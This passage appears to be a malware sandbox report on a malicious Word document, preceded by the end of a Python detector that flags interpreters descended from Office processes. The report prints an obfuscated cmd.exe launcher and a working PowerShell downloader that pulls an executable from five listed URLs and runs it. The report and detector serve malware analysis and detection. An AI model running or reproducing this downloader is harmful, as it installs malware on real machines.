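    Event(1868, 3012, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    Event(4100, 1200, r"C:\Windows\explorer.exe"),  # unrelated sibling, must not fire
]

# Assumed lists: Office hosts, the script/LOLBin interpreters worth alerting on, and the
# one child Word starts legitimately (splwow64.exe, the 32-bit print-driver host).
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "mspub.exe", "msaccess.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
ALLOWED_OFFICE_CHILDREN = {"splwow64.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(events):
    """pid -> event; PIDs are assumed unique within the window (PID reuse is ignored here)."""
    return {e.pid: e for e in events}


def ancestry(tree, pid):
    """[process, parent, grandparent, ...], stopping at an unknown parent or a cycle."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        chain.append(tree[pid])
        pid = tree[pid].ppid
    return chain


def office_descendants(events):
    """Every interpreter whose ancestry, at any depth, contains an Office host."""
    tree, hits = build_tree(events), []
    for e in events:
        if basename(e.image) not in INTERPRETERS:
            continue
        chain = ancestry(tree, e.pid)
        if any(basename(a.image) in OFFICE for a in chain[1:]):
            hits.append((e, chain))
    return hits


def direct_unexpected_children(events):
    """The sandbox's one-level rule: an Office host directly spawning anything not allow-listed."""
    tree = build_tree(events)
    return [e for e in events
            if e.ppid in tree
            and basename(tree[e.ppid].image) in OFFICE
            and basename(e.image) not in ALLOWED_OFFICE_CHILDREN]


def format_chain(chain):
    """Render an ancestry root-first, e.g. winword.exe(1664) -> cmd.exe(2844)."""
    return " -> ".join(f"{basename(e.image)}({e.pid})" for e in reversed(chain))


if __name__ == "__main__":
    for e in direct_unexpected_children(EVENTS):
        print("one-level hit:", basename(e.image), e.pid)
    for _, chain in office_descendants(EVENTS):
        print("ancestry hit:", format_chain(chain))
```

On the constructed events the one-level rule reports only cmd.exe (2844), exactly as the sandbox did, while the ancestry walk also reports the second cmd.exe and powershell.exe with the full chain back to WINWORD.EXE; splwow64.exe is skipped by both because Word starts it legitimately. Feeding real Sysmon or 4688 events in requires only mapping their ProcessId, ParentProcessId and Image fields onto Event.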

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\cmd.exe

cmd /c cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ 
\\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c
\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t
-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "

C:\Windows\SysWOW64\cmd.exe

cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ 

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell $hLj=new-object Net.WebClient;$hVO='http://baominhonline.com/EnM0X@http://craquesdoradio.com.br/wp-includes/random_compat/aK@http://csubiz.us/oeh@http://ccoolmedia.com/P6fi1X6@http://casellamoving.com/MPOK64SC'.Split('@');$cJF = '974';$wsi=$env:temp+'\'+$cJF+'.exe';foreach($AWz in $hVO){try{$hLj.DownloadFile($AWz, $wsi);Start-Process $wsi;break;}catch{}}

Network

Country Destination Domain Proto
US 8.8.8.8:53 baominhonline.com udp
US 8.8.8.8:53 craquesdoradio.com.br udp
US 8.8.8.8:53 csubiz.us udp
US 8.8.8.8:53 ccoolmedia.com udp
US 8.8.8.8:53 casellamoving.com udp
US 76.223.105.230:80 casellamoving.com tcp
US 76.223.105.230:443 casellamoving.com tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 b05bb4e3da3053b7db3ee1ee22959dae
SHA1 9e50fac8322bb847c27f7089c5203ec5896225b3
SHA256 1aef690de2f600d07971f3545dc4a05e1f8a9fc004e8106dd51d32076d629c19
SHA512 17685061c444012d0ff7a725418cce4cfeca59ac5a590340fa2945e3b0b6036159f4e342b54b4e0d6729932ef87c9a4b15f379a3a756f84baf9569aac73006ea

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 09:08

Reported

2024-05-27 09:11

Platform

win10v2004-20240508-en

Max time kernel

134s

Max time network

131s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc" /o ""

C:\Windows\SYSTEM32\cmd.exe

C:\Windows\system32\cmd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $hLj=new-object Net.WebClient;$hVO='http://baominhonline.com/EnM0X@http://craquesdoradio.com.br/wp-includes/random_compat/aK@http://csubiz.us/oeh@http://ccoolmedia.com/P6fi1X6@http://casellamoving.com/MPOK64SC'.Split('@');$cJF = '974';$wsi=$env:temp+'\'+$cJF+'.exe';foreach($AWz in $hVO){try{$hLj.DownloadFile($AWz, $wsi);Start-Process $wsi;break;}catch{}}

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4332,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 baominhonline.com udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 craquesdoradio.com.br udp
US 8.8.8.8:53 csubiz.us udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.161:443 www.bing.com tcp
US 8.8.8.8:53 ccoolmedia.com udp
US 8.8.8.8:53 casellamoving.com udp
US 76.223.105.230:80 casellamoving.com tcp
US 8.8.8.8:53 161.61.62.23.in-addr.arpa udp
US 76.223.105.230:443 casellamoving.com tcp
US 8.8.8.8:53 230.105.223.76.in-addr.arpa udp
US 8.8.8.8:53 73.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.184:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 184.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 241.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqw43bwr.4uu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\TCD27E0.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
